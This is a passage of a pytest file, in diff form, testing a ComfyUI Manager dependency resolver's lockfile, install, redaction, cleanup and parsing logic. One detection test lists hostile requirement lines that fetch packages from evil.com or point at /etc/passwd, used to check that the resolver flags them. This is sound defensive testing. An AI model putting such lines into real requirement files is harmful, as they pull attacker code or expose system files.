        with mock.patch.object(r, "_get_uv_cmd", return_value=["uv"]):
            with mock.patch("subprocess.run",
                            side_effect=self._fake_uv_run("numpy==1.24.0\n", captured_cmd)):
                result = r.compile_lockfile(deps)
        try:
            assert result.success
            assert "--constraint" in captured_cmd
        finally:
            self._cleanup(result)
+
+
+# ===========================================================================
+# install_from_lockfile
+# ===========================================================================
+
class TestInstallFromLockfile:
    """install_from_lockfile behaviour against a mocked uv subprocess."""

    @staticmethod
    def _write_lockfile(tmp_path, text):
        # Materialise a lockfile under the test's temp dir; return its path.
        lock = tmp_path / "resolved.txt"
        lock.write_text(text)
        return str(lock)

    def test_success(self, tmp_path):
        lock = self._write_lockfile(tmp_path, "numpy==1.24.0\n")
        resolver = _resolver([])
        ok = subprocess.CompletedProcess(
            [], 0, stdout="Installed numpy-1.24.0\n", stderr=""
        )
        with mock.patch.object(resolver, "_get_uv_cmd", return_value=["uv"]), \
             mock.patch("subprocess.run", return_value=ok):
            result = resolver.install_from_lockfile(lock)
        assert result.success
        assert len(result.installed) == 1

    def test_failure(self, tmp_path):
        lock = self._write_lockfile(tmp_path, "nonexistent-pkg==1.0.0\n")
        resolver = _resolver([])
        failed = subprocess.CompletedProcess(
            [], 1, stdout="", stderr="No matching distribution found"
        )
        with mock.patch.object(resolver, "_get_uv_cmd", return_value=["uv"]), \
             mock.patch("subprocess.run", return_value=failed):
            result = resolver.install_from_lockfile(lock)
        assert not result.success
        assert result.stderr != ""

    def test_timeout(self, tmp_path):
        lock = self._write_lockfile(tmp_path, "numpy==1.24.0\n")
        resolver = _resolver([])
        with mock.patch.object(resolver, "_get_uv_cmd", return_value=["uv"]), \
             mock.patch("subprocess.run", side_effect=subprocess.TimeoutExpired("uv", 600)):
            result = resolver.install_from_lockfile(lock)
        assert not result.success
        assert "TimeoutExpired" in result.stderr

    def test_atomic_failure_empty_installed(self, tmp_path):
        # A failed install must not report any package as installed.
        lock = self._write_lockfile(tmp_path, "broken-pkg==1.0.0\n")
        resolver = _resolver([])
        failed = subprocess.CompletedProcess([], 1, stdout="", stderr="error")
        with mock.patch.object(resolver, "_get_uv_cmd", return_value=["uv"]), \
             mock.patch("subprocess.run", return_value=failed):
            result = resolver.install_from_lockfile(lock)
        assert not result.success
        assert result.installed == []
+
+
+# ===========================================================================
+# Credential redaction
+# ===========================================================================
+
class TestCredentialRedaction:
    """URLs printed by the resolver must have embedded credentials masked."""

    def test_redact_user_pass(self):
        resolver = _resolver([])
        url = "https://user:pass123@pypi.example.com/simple"
        redacted = resolver._redact_url(url)
        assert "user:pass123" not in redacted
        assert "****@" in redacted

    def test_no_credentials_passthrough(self):
        resolver = _resolver([])
        plain = "https://pypi.org/simple"
        # A URL without credentials is returned unchanged.
        assert resolver._redact_url(plain) == plain

    def test_redact_pattern(self):
        masked = _CREDENTIAL_PATTERN.sub('://****@', "https://a:b@host")
        assert masked == "https://****@host"
+
+
+# ===========================================================================
+# cleanup_stale_tmp
+# ===========================================================================
+
class TestCleanupStaleTmp:
    """cleanup_stale_tmp removes only old directories carrying the resolver prefix."""

    @staticmethod
    def _age_dir(path, seconds):
        # Push atime/mtime into the past so the directory looks stale.
        stamp = time.time() - seconds
        os.utime(path, (stamp, stamp))

    def test_removes_old_dirs(self, tmp_path):
        stale = os.path.join(str(tmp_path), f"{_TMP_PREFIX}old")
        os.makedirs(stale)
        self._age_dir(stale, 7200)  # 2 hours ago
        with mock.patch("tempfile.gettempdir", return_value=str(tmp_path)):
            UnifiedDepResolver.cleanup_stale_tmp(max_age_seconds=3600)
        assert not os.path.exists(stale)

    def test_preserves_recent_dirs(self, tmp_path):
        recent = os.path.join(str(tmp_path), f"{_TMP_PREFIX}recent")
        os.makedirs(recent)
        with mock.patch("tempfile.gettempdir", return_value=str(tmp_path)):
            UnifiedDepResolver.cleanup_stale_tmp(max_age_seconds=3600)
        assert os.path.exists(recent)

    def test_ignores_non_prefix_dirs(self, tmp_path):
        # Old, but without the resolver's prefix — must be left alone.
        unrelated = os.path.join(str(tmp_path), "other_dir")
        os.makedirs(unrelated)
        self._age_dir(unrelated, 7200)
        with mock.patch("tempfile.gettempdir", return_value=str(tmp_path)):
            UnifiedDepResolver.cleanup_stale_tmp(max_age_seconds=3600)
        assert os.path.exists(unrelated)
+
+
+# ===========================================================================
+# Concurrency: unique temp directories
+# ===========================================================================
+
class TestConcurrency:
    """Temp-directory isolation between successive compile_lockfile calls."""

    def test_unique_temp_directories(self):
        """Two resolver runs must each get a distinct mkdtemp directory."""
        dirs: list[str] = []

        original_mkdtemp = tempfile.mkdtemp

        def capturing_mkdtemp(**kwargs):
            # Record every directory the resolver actually creates.
            d = original_mkdtemp(**kwargs)
            dirs.append(d)
            return d

        r = _resolver([])
        deps = CollectedDeps(
            requirements=[PackageRequirement("numpy", "numpy", "/p")],
        )

        def fake_run(cmd, **kwargs):
            # Stand-in for uv: write the lockfile named by --output-file.
            for i, arg in enumerate(cmd):
                if arg == "--output-file" and i + 1 < len(cmd):
                    with open(cmd[i + 1], "w") as f:
                        f.write("numpy==1.24.0\n")
            return subprocess.CompletedProcess(cmd, 0, stdout="", stderr="")

        try:
            with mock.patch.object(r, "_get_uv_cmd", return_value=["uv"]):
                with mock.patch("subprocess.run", side_effect=fake_run):
                    with mock.patch(
                        "comfyui_manager.common.unified_dep_resolver.tempfile.mkdtemp",
                        side_effect=capturing_mkdtemp,
                    ):
                        r.compile_lockfile(deps)
                        r.compile_lockfile(deps)

            assert len(dirs) == 2
            assert dirs[0] != dirs[1]
        finally:
            # Fix: the directories are real (created by the original mkdtemp),
            # so remove them even when an assertion above fails; previously a
            # failing assert leaked them.
            for d in dirs:
                shutil.rmtree(d, ignore_errors=True)
+
+
+# ===========================================================================
+# resolve_and_install (full pipeline)
+# ===========================================================================
+
class TestResolveAndInstall:
    """End-to-end pipeline (collect → compile → install) with uv fully mocked."""

    def test_no_deps_returns_success(self, tmp_path):
        # A pack without any requirements file resolves trivially; uv is never run.
        p = _make_node_pack(str(tmp_path), "pack_a")  # No requirements.txt
        r = _resolver([p])
        result = r.resolve_and_install()
        assert result.success

    def test_uv_not_available_raises(self, tmp_path):
        # UvNotAvailableError must propagate to the caller, not become a result.
        p = _make_node_pack(str(tmp_path), "pack_a", "numpy\n")
        r = _resolver([p])
        with mock.patch.object(r, "_get_uv_cmd", side_effect=UvNotAvailableError("no uv")):
            with pytest.raises(UvNotAvailableError):
                r.resolve_and_install()

    def test_compile_failure_returns_error(self, tmp_path):
        # A non-zero uv exit during compile becomes an unsuccessful result
        # whose error mentions the failing phase.
        p = _make_node_pack(str(tmp_path), "pack_a", "numpy\n")
        r = _resolver([p])

        with mock.patch.object(r, "_get_uv_cmd", return_value=["uv"]):
            with mock.patch("subprocess.run", return_value=subprocess.CompletedProcess(
                [], 1, stdout="", stderr="conflict error"
            )):
                result = r.resolve_and_install()

        assert not result.success
        assert "compile failed" in result.error

    def test_full_success_pipeline(self, tmp_path):
        # Happy path: one compile invocation, one install invocation,
        # and the collected requirements surface on the result object.
        p = _make_node_pack(str(tmp_path), "pack_a", "numpy>=1.20\n")
        r = _resolver([p])

        call_count = {"compile": 0, "install": 0}

        def fake_run(cmd, **kwargs):
            # Dispatch on the command line: uv is expected to be invoked once
            # with "compile" (writing the lockfile to --output-file) and once
            # with "install".
            cmd_str = " ".join(cmd)
            if "compile" in cmd_str:
                call_count["compile"] += 1
                for i, arg in enumerate(cmd):
                    if arg == "--output-file" and i + 1 < len(cmd):
                        with open(cmd[i + 1], "w") as f:
                            f.write("numpy==1.24.0\n")
                return subprocess.CompletedProcess(cmd, 0, stdout="", stderr="")
            elif "install" in cmd_str:
                call_count["install"] += 1
                return subprocess.CompletedProcess(
                    cmd, 0, stdout="Installed numpy-1.24.0\n", stderr=""
                )
            return subprocess.CompletedProcess(cmd, 0, stdout="", stderr="")

        with mock.patch.object(r, "_get_uv_cmd", return_value=["uv"]):
            with mock.patch("subprocess.run", side_effect=fake_run):
                result = r.resolve_and_install()

        assert result.success
        assert call_count["compile"] == 1
        assert call_count["install"] == 1
        assert result.collected is not None
        assert len(result.collected.requirements) == 1
+
+
+# ===========================================================================
+# Multiple custom_nodes paths
+# ===========================================================================
+
class TestMultiplePaths:
    """Requirements are gathered across several custom_nodes base directories."""

    def test_collection_from_multiple_paths(self, tmp_path):
        pack_one = _make_node_pack(os.path.join(str(tmp_path), "custom_nodes_a"),
                                   "pack_1", "numpy\n")
        pack_two = _make_node_pack(os.path.join(str(tmp_path), "custom_nodes_b"),
                                   "pack_2", "requests\n")
        collected = _resolver([pack_one, pack_two]).collect_requirements()
        # Both packs contribute, regardless of which base dir holds them.
        assert {req.name for req in collected.requirements} == {"numpy", "requests"}
+
+
+# ===========================================================================
+# cm_global defensive access
+# ===========================================================================
+
class TestDefensiveAccess:
    """Constructor defaults: omitted or None config collapses to empty containers."""

    def test_default_blacklist_is_empty_set(self):
        assert UnifiedDepResolver(node_pack_paths=[]).blacklist == set()

    def test_default_overrides_is_empty_dict(self):
        assert UnifiedDepResolver(node_pack_paths=[]).overrides == {}

    def test_default_downgrade_blacklist_is_empty_list(self):
        assert UnifiedDepResolver(node_pack_paths=[]).downgrade_blacklist == []

    def test_explicit_none_uses_defaults(self):
        resolver = UnifiedDepResolver(
            node_pack_paths=[],
            blacklist=None,
            overrides=None,
            downgrade_blacklist=None,
        )
        # Passing None explicitly behaves the same as omitting the argument.
        assert resolver.blacklist == set()
        assert resolver.overrides == {}
        assert resolver.downgrade_blacklist == []
+
+
+# ===========================================================================
+# Regex patterns
+# ===========================================================================
+
class TestPatterns:
    """Module-level regexes: dangerous-option detection and version-spec parsing."""

    def test_dangerous_pattern_matches(self):
        flagged = [
            "-r secret.txt",
            "--requirement secret.txt",
            "-e git+https://evil.com",
            "--editable ./local",
            "-c constraints.txt",
            "--find-links http://evil.com",
            "-f http://evil.com",
            "pkg @ file:///etc/passwd",
        ]
        for line in flagged:
            assert _DANGEROUS_PATTERNS.match(line), line

    def test_dangerous_pattern_no_false_positive(self):
        benign = [
            "numpy>=1.20",
            "requests",
            "torch --index-url https://x.com",
        ]
        for line in benign:
            assert _DANGEROUS_PATTERNS.match(line) is None, line

    def test_version_spec_pattern(self):
        match = _VERSION_SPEC_PATTERN.search("torch>=2.0")
        assert match is not None
        # Groups: package name, comparison operator, version string.
        assert match.group(1) == "torch"
        assert match.group(2) == ">="
        assert match.group(3) == "2.0"

    def test_version_spec_no_version(self):
        # No operator present → no match at all.
        assert _VERSION_SPEC_PATTERN.search("torch") is None
+
+
+# ===========================================================================
+# _extract_package_name
+# ===========================================================================
+
class TestExtractPackageName:
    """_extract_package_name strips specifiers/extras/URLs and normalises the name."""

    @staticmethod
    def _name(spec):
        return UnifiedDepResolver._extract_package_name(spec)

    def test_simple_name(self):
        assert self._name("numpy") == "numpy"

    def test_with_version(self):
        assert self._name("numpy>=1.20") == "numpy"

    def test_normalisation(self):
        # Case-folded, hyphens mapped to underscores.
        assert self._name("My-Package>=1.0") == "my_package"

    def test_extras(self):
        assert self._name("requests[security]") == "requests"

    def test_at_url(self):
        assert self._name("pkg @ https://example.com/pkg.tar.gz") == "pkg"
+
+
+# ===========================================================================
+# _is_disabled_path
+# ===========================================================================
+
class TestIsDisabledPath:
    """Detection of disabled node-pack paths under both layout conventions."""

    def test_new_style(self):
        # New layout: pack lives under a ".disabled" parent directory.
        assert UnifiedDepResolver._is_disabled_path("/custom_nodes/.disabled/my_pack")

    def test_old_style(self):
        # Old layout: the pack directory itself carries a ".disabled" suffix.
        assert UnifiedDepResolver._is_disabled_path("/custom_nodes/my_pack.disabled")

    def test_normal_path(self):
        assert not UnifiedDepResolver._is_disabled_path("/custom_nodes/my_pack")

    def test_trailing_slash(self):
        # A trailing slash must not hide the ".disabled" suffix.
        assert UnifiedDepResolver._is_disabled_path("/custom_nodes/my_pack.disabled/")
+
+
+# ===========================================================================
+# collect_node_pack_paths
+# ===========================================================================
+
class TestCollectNodePackPaths:
    """collect_node_pack_paths lists pack directories beneath each base dir."""

    def test_collects_subdirectories(self, tmp_path):
        base = tmp_path / "custom_nodes"
        base.mkdir()
        for pack in ("pack_a", "pack_b"):
            (base / pack).mkdir()
        (base / "file.txt").touch()  # plain file — must be excluded
        found = collect_node_pack_paths([str(base)])
        assert sorted(os.path.basename(p) for p in found) == ["pack_a", "pack_b"]

    def test_nonexistent_base_dir(self):
        # A missing base directory yields nothing rather than raising.
        assert collect_node_pack_paths(["/nonexistent/path"]) == []

    def test_multiple_base_dirs(self, tmp_path):
        first = tmp_path / "cn1"
        second = tmp_path / "cn2"
        first.mkdir()
        second.mkdir()
        (first / "pack_a").mkdir()
        (second / "pack_b").mkdir()
        found = collect_node_pack_paths([str(first), str(second)])
        assert sorted(os.path.basename(p) for p in found) == ["pack_a", "pack_b"]

    def test_empty_base_dir(self, tmp_path):
        base = tmp_path / "custom_nodes"
        base.mkdir()
        assert collect_node_pack_paths([str(base)]) == []
+
+
+# ===========================================================================
+# collect_base_requirements
+# ===========================================================================
+
class TestCollectBaseRequirements:
    """collect_base_requirements merges ComfyUI and manager requirement files."""

    def test_reads_both_files(self, tmp_path):
        (tmp_path / "requirements.txt").write_text("numpy>=1.20\n")
        (tmp_path / "manager_requirements.txt").write_text("requests\n")
        assert collect_base_requirements(str(tmp_path)) == ["numpy>=1.20", "requests"]

    def test_skips_comments_and_blanks(self, tmp_path):
        # Comment lines, empty lines and whitespace-only lines are dropped.
        (tmp_path / "requirements.txt").write_text("# comment\n\nnumpy\n \n")
        assert collect_base_requirements(str(tmp_path)) == ["numpy"]

    def test_missing_files(self, tmp_path):
        # Neither file present → empty list, no exception.
        assert collect_base_requirements(str(tmp_path)) == []

    def test_only_requirements_txt(self, tmp_path):
        (tmp_path / "requirements.txt").write_text("torch\n")
        assert collect_base_requirements(str(tmp_path)) == ["torch"]
+
+
+# ===========================================================================
+# _parse_conflicts (direct unit tests)
+# ===========================================================================
+
class TestParseConflicts:
    """_parse_conflicts filters uv stderr down to conflict/error lines."""

    def test_extracts_conflict_lines(self):
        stderr = (
            "Resolved 10 packages\n"
            "error: package torch has conflicting requirements\n"
            " conflict between numpy>=2.0 and numpy<1.25\n"
            "some other info\n"
        )
        parsed = UnifiedDepResolver._parse_conflicts(stderr)
        assert len(parsed) == 2
        assert "conflicting" in parsed[0]
        assert "conflict" in parsed[1]

    def test_extracts_error_lines(self):
        parsed = UnifiedDepResolver._parse_conflicts(
            "ERROR: No matching distribution found for nonexistent-pkg\n"
        )
        assert len(parsed) == 1
        assert "nonexistent-pkg" in parsed[0]

    def test_empty_stderr(self):
        assert UnifiedDepResolver._parse_conflicts("") == []

    def test_whitespace_only_stderr(self):
        assert UnifiedDepResolver._parse_conflicts(" \n\n ") == []

    def test_no_conflict_keywords_falls_back_to_full_stderr(self):
        stderr = "resolution failed due to incompatible versions"
        # Without 'conflict'/'error' keywords the stripped stderr is returned whole.
        assert UnifiedDepResolver._parse_conflicts(stderr) == [stderr.strip()]

    def test_mixed_lines(self):
        parsed = UnifiedDepResolver._parse_conflicts(
            "info: checking packages\n"
            "error: failed to resolve\n"
            "debug: trace output\n"
        )
        assert len(parsed) == 1
        assert "failed to resolve" in parsed[0]
+
+
+# ===========================================================================
+# _parse_install_output (direct unit tests)
+# ===========================================================================
+
class TestParseInstallOutput:
    """_parse_install_output splits uv stdout into installed vs. skipped packages."""

    def test_installed_packages(self):
        # Each "Installed <pkg>" line counts as one installed package.
        result = subprocess.CompletedProcess(
            [], 0,
            stdout="Installed numpy-1.24.0\nInstalled requests-2.31.0\n",
            stderr="",
        )
        installed, skipped = UnifiedDepResolver._parse_install_output(result)
        assert len(installed) == 2
        assert any("numpy" in p for p in installed)

    def test_skipped_packages(self):
        # "Requirement already satisfied" lines land in skipped, not installed.
        result = subprocess.CompletedProcess(
            [], 0,
            stdout="Requirement already satisfied: numpy==1.24.0\n",
            stderr="",
        )
        installed, skipped = UnifiedDepResolver._parse_install_output(result)
        assert len(installed) == 0
        assert len(skipped) == 1
        assert "already" in skipped[0].lower()

    def test_mixed_installed_and_skipped(self):
        # "Updated" lines count as installed alongside "Installed" lines.
        result = subprocess.CompletedProcess(
            [], 0,
            stdout=(
                "Requirement already satisfied: numpy==1.24.0\n"
                "Installed requests-2.31.0\n"
                "Updated torch-2.1.0\n"
            ),
            stderr="",
        )
        installed, skipped = UnifiedDepResolver._parse_install_output(result)
        assert len(installed) == 2  # "Installed" + "Updated"
        assert len(skipped) == 1  # "already satisfied"

    def test_empty_output(self):
        result = subprocess.CompletedProcess([], 0, stdout="", stderr="")
        installed, skipped = UnifiedDepResolver._parse_install_output(result)
        assert installed == []
        assert skipped == []

    def test_unrecognized_lines_ignored(self):
        # Progress chatter ("Resolving", "Downloading") is silently dropped.
        result = subprocess.CompletedProcess(
            [], 0,
            stdout="Resolving dependencies...\nDownloading numpy-1.24.0.whl\n",
            stderr="",
        )
        installed, skipped = UnifiedDepResolver._parse_install_output(result)
        assert installed == []
        assert skipped == []
+
+
+# ===========================================================================
+# resolve_and_install: general Exception path
+# ===========================================================================
+
class TestResolveAndInstallExceptionPath:
    """resolve_and_install converts unexpected exceptions into error results."""

    def test_unexpected_exception_returns_error_result(self, tmp_path):
        """Non-UvNotAvailableError exceptions should be caught and returned."""
        pack = _make_node_pack(str(tmp_path), "pack_a", "numpy\n")
        resolver = _resolver([pack])
        with mock.patch.object(
            resolver, "collect_requirements",
            side_effect=RuntimeError("unexpected disk failure"),
        ):
            outcome = resolver.resolve_and_install()
        assert not outcome.success
        assert "unexpected disk failure" in outcome.error

    def test_unexpected_exception_during_compile(self, tmp_path):
        """Exception in compile_lockfile should be caught by resolve_and_install."""
        pack = _make_node_pack(str(tmp_path), "pack_a", "numpy\n")
        resolver = _resolver([pack])
        with mock.patch.object(resolver, "_get_uv_cmd", return_value=["uv"]):
            with mock.patch.object(
                resolver, "compile_lockfile",
                side_effect=OSError("permission denied"),
            ):
                outcome = resolver.resolve_and_install()
        assert not outcome.success
        assert "permission denied" in outcome.error